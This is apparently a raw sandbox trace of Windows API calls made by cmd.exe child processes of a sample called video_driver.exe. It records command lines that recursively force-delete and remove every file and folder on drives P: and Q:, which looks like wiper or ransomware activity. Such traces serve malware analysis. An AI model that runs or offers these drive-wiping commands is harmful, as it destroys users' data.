(in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceddc | out: phkResult=0x2ceddc*=0x68) returned 0x0 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x0, lpData=0x2cede8*=0x40, lpcbData=0x2cede0*=0x1000) returned 0x2 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x1, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x0, lpData=0x2cede8*=0x1, lpcbData=0x2cede0*=0x1000) returned 0x2 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x0, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x9, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x4, lpData=0x2cede8*=0x9, lpcbData=0x2cede0*=0x4) returned 0x0 [0068.488] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cede4, lpData=0x2cede8, lpcbData=0x2cede0*=0x1000 | out: lpType=0x2cede4*=0x0, lpData=0x2cede8*=0x9, lpcbData=0x2cede0*=0x1000) returned 0x2 [0068.488] RegCloseKey (hKey=0x68) returned 0x0 [0068.488] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.488] srand (_Seed=0x5eb34b6e) [0068.488] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q" [0068.488] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"P:\" del /f /s /q \"P:\" & FOR /D %p IN (\"P:\") DO rmdir \"%p\" /s /q" [0068.488] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.489] GetProcessHeap () returned 0x590000 [0068.489] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a20f8 [0068.489] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.489] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.489] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.489] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.489] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.489] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.489] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.489] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.489] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.489] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.489] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.489] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.489] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.490] GetProcessHeap () returned 0x590000 [0068.490] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2bd0 | out: hHeap=0x590000) returned 1 [0068.490] GetEnvironmentStringsW () returned 0x5a2310* [0068.490] GetProcessHeap () returned 0x590000 [0068.490] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4c70 [0068.490] FreeEnvironmentStringsW (penv=0x5a2310) returned 1 [0068.490] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.490] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.490] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.490] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.490] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.490] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.490] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.490] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.490] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.490] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.490] GetProcessHeap () returned 0x590000 [0068.490] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a17c8 [0068.490] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfba8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.491] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfba8, lpFilePart=0x2cfba4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cfba4*="Desktop") returned 0x25 [0068.491] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.491] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf924 | out: lpFindFileData=0x2cf924*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a5760 [0068.491] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0068.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf924 | out: lpFindFileData=0x2cf924*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a5760 [0068.491] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0068.491] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf924 | out: lpFindFileData=0x2cf924*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a5760 [0068.491] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0068.492] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.492] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.492] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.492] GetProcessHeap () returned 0x590000 [0068.492] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4c70 | out: hHeap=0x590000) returned 1 [0068.492] GetEnvironmentStringsW () returned 0x5a4180* [0068.492] GetProcessHeap () returned 0x590000 [0068.492] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5fa0 [0068.492] FreeEnvironmentStringsW (penv=0x5a4180) returned 1 [0068.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.492] GetProcessHeap () returned 0x590000 [0068.492] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a17c8 | out: hHeap=0x590000) returned 1 [0068.492] GetProcessHeap () returned 0x590000 [0068.492] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6ae0 [0068.493] GetProcessHeap () returned 0x590000 [0068.493] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x5a2e50 [0068.493] GetProcessHeap () returned 0x590000 [0068.493] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0068.493] GetConsoleOutputCP () returned 0x1b5 [0068.493] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.493] GetUserDefaultLCID () returned 0x409 [0068.494] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfce8, cchData=128 | out: lpLCData="0") returned 2 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfce8, cchData=128 | out: lpLCData="0") returned 2 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfce8, cchData=128 | out: lpLCData="1") returned 2 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.495] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.497] GetProcessHeap () returned 0x590000 [0068.497] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2ef8 [0068.497] GetConsoleTitleW (in: lpConsoleTitle=0x5a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.497] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.497] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.497] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.497] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.498] GetProcessHeap () returned 0x590000 [0068.498] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6ae0 [0068.498] GetProcessHeap () returned 0x590000 [0068.498] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0068.499] GetProcessHeap () returned 0x590000 [0068.499] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a57e0 [0068.499] GetEnvironmentVariableW (in: lpName="p IN (\"P", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="CD") returned 13 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="ERRORLEVEL") returned 11 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="CMDEXTVERSION") returned 13 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="CMDCMDLINE") returned 13 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="DATE") returned 12 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="TIME") returned -4 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="RANDOM") returned -2 [0068.499] _wcsicmp (_String1="p IN (\"P", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.499] GetProcessHeap () returned 0x590000 [0068.499] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a57e0 | out: hHeap=0x590000) returned 1 [0068.499] GetProcessHeap () returned 0x590000 [0068.499] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0068.499] GetProcessHeap () returned 0x590000 [0068.499] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0068.500] GetProcessHeap () returned 0x590000 [0068.500] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0068.500] GetProcessHeap () returned 0x590000 [0068.500] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0068.500] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.500] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.500] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.500] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.500] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.500] GetProcessHeap () returned 0x590000 [0068.500] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3110 [0068.500] GetProcessHeap () returned 0x590000 [0068.500] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x59ffc0 [0068.501] GetProcessHeap () returned 0x590000 [0068.501] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0068.501] GetProcessHeap () returned 0x590000 [0068.501] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x16) returned 0x5a1800 [0068.501] GetProcessHeap () returned 0x590000 [0068.501] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a1800) returned 0x16 [0068.501] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.502] GetProcessHeap () returned 0x590000 [0068.502] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3170 [0068.502] GetProcessHeap () returned 0x590000 [0068.502] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a31d0 [0068.502] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.502] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.503] GetProcessHeap () returned 0x590000 [0068.503] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a31f0 [0068.503] GetProcessHeap () returned 0x590000 [0068.503] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5a57e0 [0068.503] GetProcessHeap () returned 0x590000 [0068.503] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x14) returned 0x5a3210 [0068.503] GetProcessHeap () returned 0x590000 [0068.503] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a3210) returned 0x14 [0068.503] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.503] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.503] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.503] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.503] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.504] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.504] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.504] GetProcessHeap () returned 0x590000 [0068.504] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3230 [0068.504] GetProcessHeap () returned 0x590000 [0068.504] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x59ffd8 [0068.504] GetProcessHeap () returned 0x590000 [0068.504] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5a3290 [0068.505] GetProcessHeap () returned 0x590000 [0068.505] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a32c0 [0068.505] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.505] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.505] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.505] GetProcessHeap () returned 0x590000 [0068.505] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3320 [0068.505] GetProcessHeap () returned 0x590000 [0068.505] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a3380 [0068.506] GetProcessHeap () returned 0x590000 [0068.506] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a33d0 [0068.506] GetProcessHeap () returned 0x590000 [0068.506] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a33d0, Size=0x12) returned 0x5a33d0 [0068.506] GetProcessHeap () returned 0x590000 [0068.506] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a33d0) returned 0x12 [0068.506] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.506] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.507] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.507] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.507] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.507] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.507] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.507] GetProcessHeap () returned 0x590000 [0068.507] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a33f0 [0068.508] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.508] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0068.509] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.509] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.509] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.509] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.509] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.509] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.509] GetProcessHeap () returned 0x590000 [0068.509] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3410 [0068.509] GetProcessHeap () returned 0x590000 [0068.509] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a3470 [0068.510] GetProcessHeap () returned 0x590000 [0068.510] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0068.512] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.513] GetFullPathNameW (in: lpFileName="P:", nBufferLength=0x208, lpBuffer=0x2cf9d8, lpFilePart=0x2cf784 | out: lpBuffer="P:\\", lpFilePart=0x2cf784*=0x0) returned 0x3 [0068.514] wcsncmp (_String1="P:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -12 [0068.519] GetFileAttributesW (lpFileName="P:\\" (normalized: "p:")) returned 0xffffffff [0068.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.519] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.520] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.520] SetConsoleInputExeNameW () returned 0x1 [0068.520] GetConsoleOutputCP () returned 0x1b5 [0068.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.520] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.521] exit (_Code=0) Process: id = "61" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42090000" os_pid = "0x318" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 89 os_tid = 0x54c [0068.618] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc24 | out: lpSystemTimeAsFileTime=0x16fc24*(dwLowDateTime=0x6b41f20, dwHighDateTime=0x1d62400)) [0068.618] GetCurrentProcessId () returned 0x318 [0068.618] GetCurrentThreadId () returned 0x54c [0068.618] GetTickCount () returned 0x114891d [0068.618] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc1c | out: lpPerformanceCount=0x16fc1c*=18875145973) returned 1 [0068.621] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.621] __set_app_type (_Type=0x1) [0068.621] __p__fmode () returned 0x770331f4 [0068.621] __p__commode () returned 0x770331fc [0068.621] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.622] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.622] GetCurrentThreadId () returned 0x54c [0068.622] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x54c) returned 0x60 [0068.622] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.622] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.622] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.623] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.623] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fbb4 | out: phkResult=0x16fbb4*=0x0) returned 0x2 [0068.623] VirtualQuery (in: lpAddress=0x16fbeb, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.623] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.623] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.623] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.623] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0068.623] GetConsoleOutputCP () returned 0x1b5 [0068.623] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.623] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.624] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.624] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.624] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.624] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.624] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.625] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.625] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.625] GetEnvironmentStringsW () returned 0x5a20f8* [0068.625] GetProcessHeap () returned 0x590000 [0068.625] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2bd0 [0068.625] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0068.625] GetProcessHeap () returned 0x590000 [0068.625] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a1898 